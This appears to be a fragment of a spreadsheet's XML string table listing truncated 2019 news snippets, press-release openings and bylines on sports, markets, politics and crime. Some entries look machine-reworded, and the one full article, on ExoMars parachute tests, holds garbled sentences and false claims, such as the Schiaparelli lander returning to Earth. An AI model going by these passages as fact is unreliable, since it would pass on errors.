    <t>0 comment St Helens ended a week which saw their coach Justin Holbrook announce he was leaving the club for NRL side Gold Coast Titans by...</t>
  </si>
  <si>
    <t>Kate Mendonca</t>
  </si>
  <si>
    <t>If you haven’t heard, Sephora’s Summer Bonus Event is on now, meaning VIBs and VIB Rouge members can save up to 20% on nearly everything in...</t>
  </si>
  <si>
    <t>Nick Cardona Aug 22nd 2019 1:08PM The city of San Francisco is trying to change the public’s perception of criminals by introducing new...</t>
  </si>
  <si>
    <t>PITTSBURGH (AP) — A man charged with killing 11 worshippers at a Pittsburgh synagogue last year has a court hearing Monday. Authorities...</t>
  </si>
  <si>
    <t>This market research report includes a detailed segmentation of the global advanced persistent threat protection market to magnify the...</t>
  </si>
  <si>
    <t>(Family Features) Summer is the perfect time to bring out the grill and enjoy creating a flavorful meal when entertaining your family and...</t>
  </si>
  <si>
    <t>After every mass shooting, the cry goes up to ban 'assault style rifles.' But a study conducted by the ALERT Center at Texas State...</t>
  </si>
  <si>
    <t>A few weeks ago, Nathan Patterson and his brother attended a Colorado Rockies game at Coors Field in Denver, and Nathan stepped into a cage...</t>
  </si>
  <si>
    <t>Khalid recently announced that he plans on putting together a benefit concert together, in hopes to help the families of victims of the...</t>
  </si>
  <si>
    <t>Daniel Austin                        More from Daniel Austin;Al Charest</t>
  </si>
  <si>
    <t>If you break the CFL season up into thirds, it’s easy to draw the conclusion that whatever happens in the Calgary Stampeders’ next six...</t>
  </si>
  <si>
    <t>Somerset Capital Management LLP grew its holdings in Compania de Minas Buenaventura SAA (NYSE:BVN) by 0.6% during the second quarter,...</t>
  </si>
  <si>
    <t>New York, NY, Aug 09, 2019 (WiredRelease): MarketResearch.biz announces the publication of its most recently generated research report...</t>
  </si>
  <si>
    <t>NAPEAN, ON, August 01, 2019 /24-7PressRelease/ -- NovaVive Inc. is a private animal health immunobiology company that manufactures and...</t>
  </si>
  <si>
    <t>By Herb Morgan at Efficient Market Advisors, a business of Cantor Fitzgerald Investment Advisors The yield on ten-year US Treasury...</t>
  </si>
  <si>
    <t>/CNW/ - Vapen MJ Ventures (OTCQX: VAPNF) (CSE: VAPN) ("Vapen MJ") a fully integrated agricultural technology, services and property...</t>
  </si>
  <si>
    <t>Star666</t>
  </si>
  <si>
    <t>0.0 00 WARNING: You will will need a box of tissues when reading the following post. In fact, you greater make it two boxes. Just to be...</t>
  </si>
  <si>
    <t>Summary of "Fluorescence enhancement of monodisperse carbon nanodots treated with aqueous ammonia and hydrogen peroxide." Affiliation...</t>
  </si>
  <si>
    <t>The oldest fossil forest in Asia has been discovered in the walls of clay quarries in China. Researchers say it is the largest example of...</t>
  </si>
  <si>
    <t>Chief Executive Officer of Rapides Regional Medical Center, Jason Cobb, has been elected treasurer of the Louisiana Hospital Association’s...</t>
  </si>
  <si>
    <t>The "Diatomite Mining Global Market Report 2019" report has been added to ResearchAndMarkets.com's offering. Global Diatomite Mining Market...</t>
  </si>
  <si>
    <t>HOUSTON, Aug. 20, 2019 /PRNewswire/ -- KBR (NYSE: KBR) announced today that it has won a 10-year, $77 million firm fixed price, sole source...</t>
  </si>
  <si>
    <t>By STEFANIE DAZO Associated Press</t>
  </si>
  <si>
    <t>This photo taken from video provided by KGO-TV shows Brynn Ota-Mathews, 23, left, and Gabriella Gaus, 26, both wounded in the mass shooting...</t>
  </si>
  <si>
    <t>Unfortunately, the hashtag #savemarinajoyce is trending on Twitter once again nowadays as police voice their issues for the usual YouTuber...</t>
  </si>
  <si>
    <t>Dublin, Aug. 06, 2019 (GLOBE NEWSWIRE) -- The "IoT Connectivity Market by Component, Organisation Size, Application Areas (Building &amp;...</t>
  </si>
  <si>
    <t>DALLAS and NORWALK, Conn., Aug. 20, 2019 /PRNewswire/ -- Affiliates of Signify Health and Remedy Partners, both portfolio companies of New...</t>
  </si>
  <si>
    <t>The company that purchased Martha Stewart’s media and merchandising brand is moving its Midtown headquarters to accommodate the television...</t>
  </si>
  <si>
    <t>JOSH BOAK and JONATHAN LEMIRE Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — President Donald Trump is warning of an economic crash if he loses reelection, arguing that even voters who personally...</t>
  </si>
  <si>
    <t>Sen. Josh Hawley, R-Mo., late Tuesday introduced the SMART Act to curb what he calls “addictive and deceptive techniques,” the latest move...</t>
  </si>
  <si>
    <t>Fashion clothier Marc Jacobs will recieve the 1st-ever "Fashion Trailblazer Award" right through MTV's Video Music Awards. The award is...</t>
  </si>
  <si>
    <t>ELKO, Nev., Aug. 07, 2019 (GLOBE NEWSWIRE) -- Barrick President and CEO Mark Bristow was joined by Nevada Governor Steve Sisolak in Elko...</t>
  </si>
  <si>
    <t>Conor Marlborough</t>
  </si>
  <si>
    <t>Blackpool fire crews tackle cooker fire in deserted flat - Blackpool Gazette</t>
  </si>
  <si>
    <t>The "Pharmaceutical Contract Development and Manufacturing Market by Service (Pharmaceutical, Biologics, Active Pharma Ingredients, Tablet,...</t>
  </si>
  <si>
    <t>LAKE PARK — The Lake Park Volunteer Fire Department is showing its continued support for the Muscular Dystrophy Association as its members...</t>
  </si>
  <si>
    <t>Paul Blest</t>
  </si>
  <si>
    <t>The Intercept put out a piece on Thursday detailing Sen. Chuck Schumer’s so-far lackluster recruiting efforts for the Senate elections in...</t>
  </si>
  <si>
    <t>NewsGram Desk</t>
  </si>
  <si>
    <t>At least 50 Indian start-ups have benefited from the programme till date</t>
  </si>
  <si>
    <t>Actress Kaley Cuoco has said she and her husband Karl Cook do not yet live under the same roof. The Big Bang Theory star, who tied the...</t>
  </si>
  <si>
    <t>Information security policies and procedures writing services are now available from the Cyber Security experts at FLANK for helping...</t>
  </si>
  <si>
    <t>Emma Graney</t>
  </si>
  <si>
    <t>The Official Opposition has challenged Labour Minister Jason Copping to open his government’s minimum wage panel to more diverse voices. If...</t>
  </si>
  <si>
    <t>COLUMBIA, Mo., Aug. 23, 2019 /PRNewswire-PRWeb/ -- A Joint Venture between Store Here Management and Tron Jordheim forms Self Storage...</t>
  </si>
  <si>
    <t>Frank Smitson</t>
  </si>
  <si>
    <t>Hennessy Advisors Inc. lowered its position in Pfizer Inc. (NYSE:PFE) by 4.6% during the second quarter, according to the company in its...</t>
  </si>
  <si>
    <t>Sustain Our Great Lakes partners today announced $6.9 million in grant funding for 25 ecological restoration projects in the Great Lakes...</t>
  </si>
  <si>
    <t>WASHINGTON, August 15, 2019 /PRNewswire-PRWeb/ -- STRmix™ – sophisticated forensic software for resolving mixed DNA profiles previously...</t>
  </si>
  <si>
    <t>Roland Hutchinson</t>
  </si>
  <si>
    <t>We recently saw a video of the new Porsche Taycan being tested out and now Porsche has released another video of the car. Porsche has also...</t>
  </si>
  <si>
    <t>0 comment Tyson Fury will take on unheralded Swede Otto Wallin at Las Vegas’ T-Mobile Arena on September 14 as the Briton inches closer to...</t>
  </si>
  <si>
    <t>By:                                       CNN Newsource</t>
  </si>
  <si>
    <t>President Donald Trump began his rally in Cincinnati talking about inner cities that are "run exclusively by Democrat politicians" but said...</t>
  </si>
  <si>
    <t>Harper Lund</t>
  </si>
  <si>
    <t>Shoal Point Energy Ltd (CNSX:SHP)’s stock price was down 13% during trading on Thursday . The stock traded as low as $0.10 and last traded...</t>
  </si>
  <si>
    <t>Press Release (ePRNews.com) - CHATTANOOGA, Tenn. - Aug 15, 2019 - Stone Door Group, a solutions integrator that partners with enterprises...</t>
  </si>
  <si>
    <t>SIMCOE, ON / ACCESSWIRE / August 27, 2019 / Metalore Resources Limited (TSXV:MET) (“Metalore” or the “Company”) announces that it has been...</t>
  </si>
  <si>
    <t>According to a report,"Matcha Tea Market Size, Share &amp; Trends Analysis Report By Product (Powder, RTD Beverage, Instant Premixes), By Grade...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 22, 2019 (PR Newswire)--Bronstein, Gewirtz &amp; Grossman, LLC notifies investors that a class action lawsuit has been filed...</t>
  </si>
  <si>
    <t>SEATTLE, Aug. 6, 2019 /PRNewswire/ -- Today, DomainTools, the leader in domain name and DNS-based cyber threat intelligence, announced it...</t>
  </si>
  <si>
    <t>Global"UV Coatings Market" 2019 Industry report offers detailed coverage of UV Coatings industry and main market trends. The market...</t>
  </si>
  <si>
    <t>NAPS, North American Precis Syndicate</t>
  </si>
  <si>
    <t>(NAPSI)—One of the most common human parasitic infestations around, head lice affect an estimated 6-12 million Americans annually, most of...</t>
  </si>
  <si>
    <t>Taylor Swift was in the spotlight at the 2019 MTV Video Music Awards — and she used part of her screentime to remind the Trump a...</t>
  </si>
  <si>
    <t>SOURCE BauBax In just a few days since launching, Crowdfunders have already invested over $500,000 in the lightweight, water/stain...</t>
  </si>
  <si>
    <t>/EIN News/ -- TORONTO, Aug. 22, 2019 (GLOBE NEWSWIRE) -- Canadian Life Companies Split Corp. (The "Company") declares its monthly...</t>
  </si>
  <si>
    <t>Buckle up, it’s time to go racin’ at the track “too tough to tame.” Plus: Take a last bite of summer fun at the S.C. Apple Festival and...</t>
  </si>
  <si>
    <t>By TIM BOOTH AP Sports Writer</t>
  </si>
  <si>
    <t>Nothing will ever be completely normal for Shaquem Griffin as a football player. He will always be known for being drafted and making the...</t>
  </si>
  <si>
    <t>WiseGuyRerports.com Presents “Global EV Charging Services Market Size, Status and Forecast 2019-2025” New Document to its Studies Database...</t>
  </si>
  <si>
    <t>MEADVILLE, Pa., Aug. 15, 2019 /PRNewswire-PRWeb/ -- "Marriage ~ As God Intended It to Be!: Reversing the Trends of Today's Society": an...</t>
  </si>
  <si>
    <t>Simon Mignolet’s six-year spell at Liverpool is coming to an end with the goalkeeper set to return to his homeland with Club Brugge. The...</t>
  </si>
  <si>
    <t>EL PASO, Texas (AP) — The Latest on a mass shooting in El Paso, Texas (all times local):</t>
  </si>
  <si>
    <t>By Theresa Waldrop and Paul P. Murphy, CNN The man suspected of killing 20 people and injuring 26 others in El Paso on Saturday may face...</t>
  </si>
  <si>
    <t>Courtesy of ZeroHedge View original post here. China's agriculture ministry warned in June that it found fall armyworms in 21 provinces,...</t>
  </si>
  <si>
    <t>Some weeks, watching game film just isn't enough, especially when preparing for a spread option offensive scheme like the one Michael Hertz...</t>
  </si>
  <si>
    <t>Kevin Matras -</t>
  </si>
  <si>
    <t>After the markets put in their best first half performance in decades (Dow’s best in 20 years and the S&amp;P’s best in 22 years), and then...</t>
  </si>
  <si>
    <t>ANDREW DALTON Associated Press</t>
  </si>
  <si>
    <t>LOS ANGELES (AP) — Attorneys for a man charged with killing two Southern California women and trying to kill a third who fought him off are...</t>
  </si>
  <si>
    <t>The "Bone Cement &amp; Glue - Market Analysis, Trends, and Forecasts" report has been added to ResearchAndMarkets.com's offering. Bone Cement &amp;...</t>
  </si>
  <si>
    <t>Louisiana State Employees Retirement System boosted its position in First Midwest Bancorp Inc (NASDAQ:FMBI) by 4.3% during the second...</t>
  </si>
  <si>
    <t>BOSTON, Aug. 26, 2019 /PRNewswire/ -- Learning company Houghton Mifflin Harcourt (HMH) (NASDAQ: HMHC) today announced that Joe Abbott, the...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Coco Gauff is still not quite used to hearing her name shouted by thousands of U.S. Open spectators reveling in each...</t>
  </si>
  <si>
    <t>Accelerate Diagnostics (NASDAQ:AXDX) had its price objective decreased by Piper Jaffray Companies from $22.00 to $19.00 in a report issued...</t>
  </si>
  <si>
    <t>Virginia Retirement Systems ET AL lowered its stake in Bank of Nova Scotia (NYSE:BNS) (TSE:BNS) by 77.9% during the second quarter,...</t>
  </si>
  <si>
    <t>SEAN MURPHY Associated Press</t>
  </si>
  <si>
    <t>NORMAN, Okla. (AP) — An Oklahoma judge on Monday found Johnson &amp; Johnson and its subsidiaries helped fuel the state's opioid crisis and...</t>
  </si>
  <si>
    <t>Almanack Investment Partners LLC. purchased a new stake in Cintas Co. (NASDAQ:CTAS) during the 2nd quarter, Holdings Channel.com reports....</t>
  </si>
  <si>
    <t>Ryan Russell is currently a free agent</t>
  </si>
  <si>
    <t>Carry Protocol (CEO: Grant Sohn, Richard Choi), a monetization platform for consumer data, has been selected by Huobi Global for Fast Track...</t>
  </si>
  <si>
    <t>Jignesh Mehta</t>
  </si>
  <si>
    <t>Hewlett Packard Enterprise (NYSE:HPE) is scheduled to announce Q3 earnings results on Tuesday, August 27th, after market close. The...</t>
  </si>
  <si>
    <t>RSS Feed</t>
  </si>
  <si>
    <t>Vehicle overturned at Thruway entrance to Garden State The Journal News | LoHud.com SPRING VALLEY — New York state troopers canceled a call...</t>
  </si>
  <si>
    <t>Among the underlying components of the Russell 3000 index, we saw noteworthy options trading volume today in 1-800 Flowers. om, Inc.</t>
  </si>
  <si>
    <t>Even before it received Tesla’s “‘Raven” updates, the Model S P100D is already a monster on the drag strip. Equipped with two electric...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- "I thought that modern technology could be harnessed to provide information about the objects of photos taken with...</t>
  </si>
  <si>
    <t>Originally posted on https://www.esta.co.nz/blog/us-travel-checklist-for-new-zealand-travellers.html When travelling to the US for the...</t>
  </si>
  <si>
    <t>INDIANAPOLIS - The Indianapolis Colts (0-3) fell to the Chicago Bears (1-2) 27-17 in tonight's preseason Week 3 video game at Lucas Oil...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 22, 2019 /PRNewswire/ -- Social media is an excellent way to promote your business. Each day, more and more brands are...</t>
  </si>
  <si>
    <t>Home Affairs Minister Peter Dutton has rejected suggestions Australia must choose whether China is a friend or foe. Australia is walking a...</t>
  </si>
  <si>
    <t>Laurence Heinen</t>
  </si>
  <si>
    <t>Kurt Bensmiller saved his best for last.Having already wrapped up his third straight World Professional Chuckwagon Association season-long...</t>
  </si>
  <si>
    <t>Carroll Jacobsen</t>
  </si>
  <si>
    <t>Sentiment for Omega Flex Inc (NASDAQ:OFLX) Omega Flex Inc (NASDAQ:OFLX) institutional sentiment increased to 1.23 in Q1 2019. Its up 0.28,...</t>
  </si>
  <si>
    <t>by Pete Martinelli</t>
  </si>
  <si>
    <t>MATTHEW Ross White has pleaded guilty to the murder of Cooktown mum Donna Steele. The Mooroobool father, 27, entered his plea after lunch...</t>
  </si>
  <si>
    <t>SOURCE Optibase Ltd. HERZLIYA, Israel, Aug. 29, 2019 /PRNewswire/ -- Optibase Ltd. (NASDAQ: OBAS) today announced financial results for...</t>
  </si>
  <si>
    <t>SANTA MONICA, Calif., Aug. 30, 2019 (GLOBE NEWSWIRE) -- GBT Technologies Inc., (OTC PINK: GTCH) ("GBT”, or the “Company”), a company...</t>
  </si>
  <si>
    <t>THOUSANDS of music lovers partied the evening away to the sounds of Frank Turner at Wickham Festival. The family-friendly event once again...</t>
  </si>
  <si>
    <t>ANI | Updated: Aug 28, 2019 12:21 IST Mumbai (Maharashtra) [India] August 28 (ANI/NewsVoir): Over-the-top (OTT) is a streaming media...</t>
  </si>
  <si>
    <t>Old Chicago Pizza &amp; Taproom, known for its hand-crafted pizza, taproom fare, and its world class beer list of local and regional craft beer...</t>
  </si>
  <si>
    <t>Boris Johnson’s £1.8 billion cash injection for the NHS has been widely criticised as “a drop in the ocean”. The Prime Minister announced...</t>
  </si>
  <si>
    <t>Bloomberg Daybreak: Middle East live from Dubai, connects Asian markets to the European opens. The show focuses on global macro issues with...</t>
  </si>
  <si>
    <t>MADISON, Wis. (AP) — Gov. Tony Evers issued an executive order Friday creating a new office to help his administration achieve his goal of...</t>
  </si>
  <si>
    <t>Tyler Treese</t>
  </si>
  <si>
    <t>Starrcast just put out a highly entertaining promotional video ahead of CM Punk’s Best In The World Live panel, where he will do a...</t>
  </si>
  <si>
    <t>Lena Pierce</t>
  </si>
  <si>
    <t>News about the ESA’s ExoMars second parachute test failure surfaced quickly, showing possible threats for the European 2020 Mars mission. What could we expect further from this project we are going to find out next. To understand better the ExoMars planet, we must acknowledge its primary goal. Firstly, it is built by a shared operation between the Russian and the European space companies, Roscosmos and ESA. The companies created the project as a two-part mission, the first of that already happened in 2016. However, the mission had the purpose of putting a craft, the Trace Gas Orbiter, into Martian area and brought back the Schiaparelli lander to the Earth. The craft succeeded to do that and it still collecting data, and Schiaparelli, on the other hand, arrived on the Mars surface, resulting in a lander part of the mission before it could have a chance to begin. ExoMars Failed The Second Parachute Test, Endangering ESA’s 2020 Mars Mission The mission’s second half is ready to be launched next year. Until then, a prime low-altitude test of the first parachute showed how well was done, followed by a recent disappointing high-altitude test. With NASA maintaining its Mars, multiple landings, ESA and Roscomos aim at its success. Looking into the second phase of the ExoMars’s mission, we understand the fact that it is made of a Russian-built lander, Kazachick, and a European-formed rover, the Rosalind Franklin. The two of them will descend as one entity. Also, its parachute is the biggest flown on any Mars project, being at 115 feet across, and recording a successful low-attitude test in March 2018. The 2019 tests, however, brought nothing but a disappointing situation because of their development. The two parachutes launched from 18 miles failed, threating the whole ExoMars mission. Scientists, however, will gather together during a September workshop, to analyze better the situation and to bring improvements. Lena Pierce Lena Pierce is a reporter for Great Lakes Ledger. After graduating from Ryerson In Toronto, Lena got an internship at CBC radio in Calgary. Lena was also a beat reporter for the Calgary Flames. Lena mostly cover sports and community events. Contact Lena here.</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / August 5, 2019 / The securities litigation law firm of The Gross Law Firm issues the following notice on behalf...</t>
  </si>
  <si>
    <t>DUBLIN, Aug. 23, 2019 /PRNewswire/ -- The "Ethiopia Construction Equipment Market (2019-2025): Market Forecast By Equipment Type,...</t>
  </si>
  <si>
    <t>FILE - In this July 25, 2019, photo provided on Friday, July 26, 2019, by the North Korean government, North Korean leader Kim Jong Un...</t>
  </si>
  <si>
    <t>By Afp</t>
  </si>
  <si>
    <t>Washington on Thursday warned US citizens to "exercise increased caution" when travelling to Hong Kong, as protesters announced three days...</t>
  </si>
  <si>
    <t>Gerald Horn and Arun Gupta outline the history of white terror in America and what its modern manifestation means for our futureÂ</t>
  </si>
  <si>
    <t>Don Groves</t>
  </si>
  <si>
    <t>‘Black Bitch.’ The first two episodes of Blackfella Films’ ABC political drama Black Bitch will have their world premiere in the Primetime...</t>
  </si>
  <si>
    <t>Police in Portland, Oregon, are earning praise from outside observers for using the city's Willamette River to keep dueling protesters...</t>
  </si>
  <si>
    <t>Gary Neville has taken a swipe at Manchester United lovers protesting the possession of the Glazer circle of relatives, describing them as...</t>
  </si>
  <si>
    <t>Herb Zurkowsky, Montreal Gazette</t>
  </si>
  <si>
    <t>Carabins’ quarterback coach says Adams has overcome a lot of adversity to finally snag the starting role in Montreal.</t>
  </si>
  <si>
    <t>The "Automated Guided Vehicle - Market Analysis, Trends, and Forecasts" report has been added to ResearchAndMarkets.com's offering....</t>
  </si>
  <si>
    <t>LOUISVILLE, Ky., Aug. 15, 2019 /PRNewswire/ -- Clear/Cut Phocus™ (Phocus), the first-of-its-kind premium sparkling water containing natural...</t>
  </si>
  <si>
    <t>GAITHERSBURG, Maryland, Aug. 20, 2019 /PRNewswire/ -- According to Stratistics MRC, the Global Nutraceutical Ingredients Market is...</t>
  </si>
  <si>
    <t>By DAVE KOLPACK Associated Press</t>
  </si>
  <si>
    <t>FARGO, N.D. (AP) — With the most dominant team in the history of the Football Championship Subdivision experiencing turnover at several...</t>
  </si>
  <si>
    <t>The EBITDA Yield for Motorcar Parts of America, Inc. (NasdaqGS:MPAA) is 0.073413. The EBITDA Yield is a great way to determine a company’s...</t>
  </si>
  <si>
    <t>SAN JOSE, Calif., Aug. 22, 2019 /PRNewswire/ -- Automation Anywhere, a global leader in Robotic Process Automation (RPA), today announced...</t>
  </si>
  <si>
    <t>GREEN BAY — Moments before kickoff, the Green Bay Packers public relations department distributed a sheet of paper in the Lambeau Field...</t>
  </si>
  <si>
    <t>TROY, N.Y. (AP) -- Mason Mallard scored on a double play in the top of the 10th inning to help lead the Hudson Valley Renegades to a 5-2...</t>
  </si>
  <si>
    <t>ByTaylor Estes</t>
  </si>
  <si>
    <t>In a continued effort to enhance the gameday festivities before, during and after Texas football home games, the University of Texas...</t>
  </si>
  <si>
    <t>South Korea summoned Japan's ambassador to protest a decision to remove Seoul's fast-track export status, which took effect on Wednesday...</t>
  </si>
  <si>
    <t>Johnson &amp; Johnson, which was the only defendant in the seven-week trial, has denied any wrongdoing.</t>
  </si>
  <si>
    <t>Joseph Griffin</t>
  </si>
  <si>
    <t>Toll Brothers (NYSE:TOL) received a $39.00 target price from Bank of America in a research report issued on Wednesday, TipRanks reports....</t>
  </si>
  <si>
    <t>If you’ve been wondering what you’ll be seeing fashion insiders wearing on vacation this summer, you’re not alone. I too have been curious...</t>
  </si>
  <si>
    <t>By Gabriella Borter BETHEL, N.Y. (Reuters) - Baby boomers dressed in tie-dye, rolling wheelchairs and chasing a memory of peace and love...</t>
  </si>
  <si>
    <t>Global “Food Additives Market”2019 Research report provides information regarding market size, share, trends, growth, cost structure,...</t>
  </si>
  <si>
    <t>WHEN Tuesday, September 3, 2019 at 10:30 a.m. WHERE Rancho Santa Fe Library, 17040 Avenida de Acacias, Rancho Santa Fe, CA 92067 Map |...</t>
  </si>
  <si>
    <t>The global paper edge protectors market size is poised to reach USD 394.06 million by 2023, according to a new report by Technavio,...</t>
  </si>
  <si>
    <t>Italian cyclist Domenico Pozzovivo will undergo surgery and miss the Spanish Vuelta after being injured in a collision with a car while...</t>
  </si>
  <si>
    <t>MRFR Offers A Thorough Analysis Of Fibrous Dysplasia Market Provides The Latest Information On The Present And The Future Industry Trends,...</t>
  </si>
  <si>
    <t>ST. PAUL — Elizabeth Warren started the day with an apology, repeating her regrets for her past claims of Native American heritage. She...</t>
  </si>
  <si>
    <t>Share HOUSTON, TX – JANUARY 09: A general view is seen during the third quarter of the AFC Wild Card Playoff game between the Houston...</t>
  </si>
  <si>
    <t>SYRACUSE, N.Y., Aug. 5, 2019 /PRNewswire/ -- The United States Army recently awarded Lockheed Martin (NYSE: LMT) three contracts to produce...</t>
  </si>
  <si>
    <t>https://www.fox23.com/video?videoId=974888353&amp;videoVersion=1.0</t>
  </si>
  <si>
    <t>James Halpin</t>
  </si>
  <si>
    <t>“Bone Daddy” is among three people snared during a drug bust Tuesday, according to township police. Officers conducting a drug...</t>
  </si>
  <si>
    <t>NRL enforcer Josh McGuire has turned to his club for support after receiving multiple death threats and online abuse. The North Queensland...</t>
  </si>
  <si>
    <t>The inverted yield curve in the 2- and 10-year Treasury note certainly has investors on edge. U.S. Treasury prices are mostly higher...</t>
  </si>
  <si>
    <t>By Nina Massey, PA Science Correspondent</t>
  </si>
  <si>
    <t>Looking on the bright side of life could help you live longer. Scientists say people with greater optimism are more likely to live longer...</t>
  </si>
  <si>
    <t>Dublin, Aug. 07, 2019 (GLOBE NEWSWIRE) -- The "Global and China Automotive Gateway Industry Report, 2019" report has been added to...</t>
  </si>
  <si>
    <t>KHALED (Posted by)</t>
  </si>
  <si>
    <t>R.(5) Blessed the man who is gracious and lends to those in need. who greatly delights in his commands. Posterity - Earth His posterity...</t>
  </si>
  <si>
    <t>news.com.au</t>
  </si>
  <si>
    <t>Ben Simmons has got game, we all know that, so perhaps it is no surprise to have seen the Philadelphia 76ers star attending Essendon’s loss...</t>
  </si>
  <si>
    <t>Ean Byrne</t>
  </si>
  <si>
    <t>ValuEngine lowered shares of Molina Healthcare (NYSE:MOH) from a hold rating to a sell rating in a research note released on Thursday,...</t>
  </si>
  <si>
    <t>Steamaster, a wholesaler providing state-of-the-art cleaning equipment, accessories and chemicals, is pleased to announce that they are now...</t>
  </si>
  <si>
    <t>U.S. stocks edged lower on Friday after rebounding strongly a day earlier, as investors grappled with fresh trade tensions, political...</t>
  </si>
  <si>
    <t>SALT LAKE CITY, Aug. 20, 2019 /PRNewswire/ -- Attorneys Jeffrey D. Eisenberg, Eric S. Olson, and Christopher P. Higley of Eisenberg, Cutt,...</t>
  </si>
  <si>
    <t>OAKLAND, Calif., Aug. 21, 2019 /PRNewswire/ -- Parents today place an immense amount of importance on the academic success of their...</t>
  </si>
  <si>
    <t>KARE Staff</t>
  </si>
  <si>
    <t>Officers found a man in his 20s who was shot and had "grave injuries." He died overnight in the hospital.</t>
  </si>
  <si>
    <t>Unfortunately for those who've been waiting for Huawei to launch its first-ever foldable smartphone, the Chinese company confirmed earlier...</t>
  </si>
  <si>
    <t>Network Rail has issued a “final reminder” that parts of the network will be closed during the bank holiday weekend amid fears that some...</t>
  </si>
  <si>
    <t>A ship which sank off the Isle of Lewis while returning servicemen from the First World War is to finally be recognised as a war grave....</t>
  </si>
  <si>
    <t>Bristol Rovers got a much needed three points at the Memorial stadium last night after seeing off nine-man Tranmere Rovers 2-0. Goals from...</t>
  </si>
  <si>
    <t>By AHMED AL-HAJ, MAGGIE MICHAEL and NOHA ELHENNAWY Associated Press</t>
  </si>
  <si>
    <t>SANAA, Yemen (AP) — Yemen's president urged Saudi Arabia on Thursday to rein in the United Arab Emirates after warplanes from his former...</t>
  </si>
  <si>
    <t>By Jessie Pang and Donny Kwok</t>
  </si>
  <si>
    <t>Reuters HONG KONG (Reuters) - Hong Kong police fired volleys of tear gas to break up anti-government protests in a gritty industrial suburb...</t>
  </si>
  <si>
    <t>by David Gunn</t>
  </si>
  <si>
    <t>Angelo Alessio insists he has signed Niko Hamalainen to compete with Greg Taylor - not to replace the in-demand Kilmarnock left-back.</t>
  </si>
  <si>
    <t>Revegy, a leading provider of account revenue optimization technology, and FinListics, a company that helps B2B sellers analyze and...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 16, 2019 /PRNewswire/ -- Inc. magazine revealed that NativePath, formally known as Lexicon Health, is No. 655 on its annual...</t>
  </si>
  <si>
    <t>GlobalFaucets Market2019report provides key statistics on the market status of the Faucets Manufacturers and is a valuable source of...</t>
  </si>
  <si>
    <t>By Scott Sturgis, The Philadelphia Inquirer</t>
  </si>
  <si>
    <t>2019 AMG E53: Some weeks, we just have to get a little crazy. Price: $92,410 as tested. (It starts at $72,550 for the trim level.)...</t>
  </si>
  <si>
    <t>LONG BEACH, Calif., Aug. 16, 2019 /PRNewswire-PRWeb/ -- Inc. magazine today revealed that Enshored (http://www.enshored.com) is No. 607 on...</t>
  </si>
  <si>
    <t>Shares of Ryman Hospitality Properties, Inc. (NYSE:RHP) currently have an average target price of $89.43. This is the consensus number...</t>
  </si>
  <si>
    <t>Treasury yields slip Tuesday before a key bond auction that could influence trading for government paper amid seemingly insatiable appetite...</t>
  </si>
  <si>
    <t>By Bruce Sinclair</t>
  </si>
  <si>
    <t>See photos images Skip to next photo 1/1 Show caption 1/1 AN INJURED person was taken to hospital following a rescue operation from...</t>
  </si>
  <si>
    <t>First Trust Advisors LP reduced its position in Service Co. International (NYSE:SCI) by 51.5% in the 2nd quarter, according to the company...</t>
  </si>
  <si>
    <t>Recycled Karma Brands, LLC, a Los Angeles based premium apparel fashion company, proudly introduces The Green Label, a collection...</t>
  </si>
  <si>
    <t>Quantitative Systematic Strategies LLC purchased a new position in Northrop Grumman Co. (NYSE:NOC) in the second quarter, according to its...</t>
  </si>
  <si>
    <t>By Jack Kinnersley For Mailonline</t>
  </si>
  <si>
    <t>Sergej Milinkovic-Savic insisted there was nothing in the links to Manchester United this summer. Speaking to Sport Plus, Milinkovic-Savic...</t>
  </si>
  <si>
    <t>Company announcement – No. 25 / 2019 Zealand Pharma delivers strong clinical results during the first half of 2019 and accelerates...</t>
  </si>
  <si>
    <t>by robbennett</t>
  </si>
  <si>
    <t>You look at your portfolio statement. It tells you that the value of the stocks you own is $100,000. And then a friend of yours mentions...</t>
  </si>
  <si>
    <t>DUBLIN --(BUSINESS WIRE) The "Myanmar Real Estate and Construction Monitor (Premium Subscription)" newsletter has been added to...</t>
  </si>
  <si>
    <t>ESPN</t>
  </si>
  <si>
    <t>The NFL, which opens the 2019 season on Thursday night, goes through the last rite of passage of the preseason -- cut-down day -- Saturday....</t>
  </si>
  <si>
    <t>By JUANA SUMMERS, Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Democratic presidential candidate Bernie Sanders has released a $16.3 trillion climate plan that builds on the Green New...</t>
  </si>
  <si>
    <t>AUCKLAND, New Zealand, Aug. 29, 2019 /PRNewswire/ -- Ubiquitome Limited, a developer of handheld, cloud connected genetic analysis devices,...</t>
  </si>
  <si>
    <t>Sentiment for Alico Inc (NASDAQ:ALCO) Alico Inc (NASDAQ:ALCO) institutional sentiment increased to 0.71 in 2019 Q1. Its up 0.10, from 0.61...</t>
  </si>
  <si>
    <t>Ozzy Osbourne felt "helpless" in hospital. The Black Sabbath star had to spend time in hospital after undergoing neck surgery and admitted...</t>
  </si>
  <si>
    <t>Advertisements The infamous Zara polka dot dress may have dominated the summer, but this affordable printed and tassels Amazon mumu is...</t>
  </si>
  <si>
    <t>Christopher Luu</t>
  </si>
  <si>
    <t>[MUSIC] [MUSIC] [MUSIC] [MUSIC] [MUSIC] [SOUND] To fete her 38th birthday, Prince Harry, Meghan Markle, and baby Archie took a holiday to...</t>
  </si>
  <si>
    <t>SAN FRANCISCO (AP) — Two music companies canceled appearances by Placido Domingo and the Los Angeles Opera said Tuesday it would launch an...</t>
  </si>
  <si>
    <t>By Annie Fowler East Oregonian  Annie Fowler  /**/ $('#author-popup-8abec4fa-e478-11e8-9bfd-077c1f13ec0c-asset-4fee857a-b3eb-11e9-9d7f-874c13d5c867').popover({ content: $('#author-popup-8abec4fa-e478-11e8-9bfd-077c1f13ec0c-asset-4fee857a-b3eb-11e9-9d7f-874c13d5c867-content').html(), html:true, trigger:'hover', placement:'top', delay:{ show:100, hide:200 } });  /**/</t>
  </si>
  <si>
    <t>The scholarships are made possible by contributions from the MacTarnahan Family Trust. The recipient must attend an Oregon college or...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 29, 2019 /PRNewswire/ -- Bragar Eagel &amp; Squire, P.C. is investigating potential claims against the board of directors of...</t>
  </si>
  <si>
